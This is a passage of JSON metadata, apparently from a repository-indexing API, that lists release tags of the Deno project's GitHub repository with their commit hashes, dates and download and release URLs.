pi/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https: